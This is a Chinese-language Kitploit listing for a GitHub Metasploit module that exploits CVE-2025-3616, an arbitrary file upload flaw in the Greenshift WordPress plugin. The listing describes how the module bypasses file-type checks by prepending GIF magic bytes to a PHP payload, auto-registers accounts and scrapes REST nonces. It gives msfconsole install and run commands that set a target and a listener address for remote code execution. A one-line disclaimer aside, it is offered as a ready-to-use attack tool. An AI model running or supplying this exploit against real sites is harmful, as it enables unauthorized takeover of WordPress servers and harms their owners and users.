Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3616 — Metasploit 模块,利用 Greenshift WordPress 插件中的任意文件上传漏洞(CVE-2025-3616),通过 MIME 欺骗实现 RCE,并具备自动注册与 nonce 提取功能。 | Kitploit
工具/GitHubGitHub/b4d-53ct0r/cve-2025-3616
漏洞利用框架漏洞分析Web应用程序漏洞利用渗透测试身份验证Payload 开发
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit 模块,利用 Greenshift WordPress 插件中的任意文件上传漏洞(CVE-2025-3616),通过 MIME 欺骗实现 RCE,并具备自动注册与 nonce 提取功能。

查看仓库
128个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Metasploit 模块: Greenshift WordPress 插件任意文件上传漏洞 (CVE-2025-3616)

此仓库包含一个 Metasploit 模块,用于利用 CVE-2025-3616,这是 Greenshift WordPress 插件(版本 11.4 至 11.4.5)中的一个任意文件上传漏洞。

该漏洞利用允许经过身份验证的用户(订阅者及以上)上传任意文件,从而导致远程代码执行(RCE)。它通过使用 GIF 魔法字节(GIF89a;)伪造 MIME 类型来绕过插件的文件类型验证。

功能特点

  • 身份验证处理:支持使用现有凭据(USERNAME/PASSWORD)登录。
  • 自动注册:包含 REGISTER 选项,可自动注册新用户并使用新的会话 cookie 利用漏洞(如果目标启用了注册功能,则非常有用)。
  • Nonce 提取:自动从管理仪表板中抓取所需的 wp_rest nonce。
  • 安全绕过:将 GIF 魔法字节附加到 PHP 有效载荷之前,以绕过 finfo_file() 验证。

安装

  1. 确保您已安装 Metasploit 框架。

  2. 将 wp_greenshift_file_upload.rb 复制到您的本地模块目录:

    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. 启动 msfconsole 并重新加载模块:

    msfconsole
    msf6 > reload_all
    

使用方法

1. 使用自动注册(推荐)

如果目标启用了用户注册,则无需凭据。

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. 使用现有凭据

如果您已有有效用户(订阅者或更高级别):

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

选项

选项必需描述
RHOSTS是目标地址
LHOST是监听地址(您的 IP)
REGISTER否设置为 true 以自动注册新帐户(默认:false)
USERNAME否WordPress 用户名(如果 REGISTER 为 false 则需要)
PASSWORD否WordPress 密码(如果 REGISTER 为 false 则需要)
EMAIL否用于注册的电子邮件(可选,如果为空则自动生成)

免责声明

此模块仅用于教育目的和授权渗透测试。在未事先获得双方同意的情况下使用此代码攻击目标是非法的。

下载工具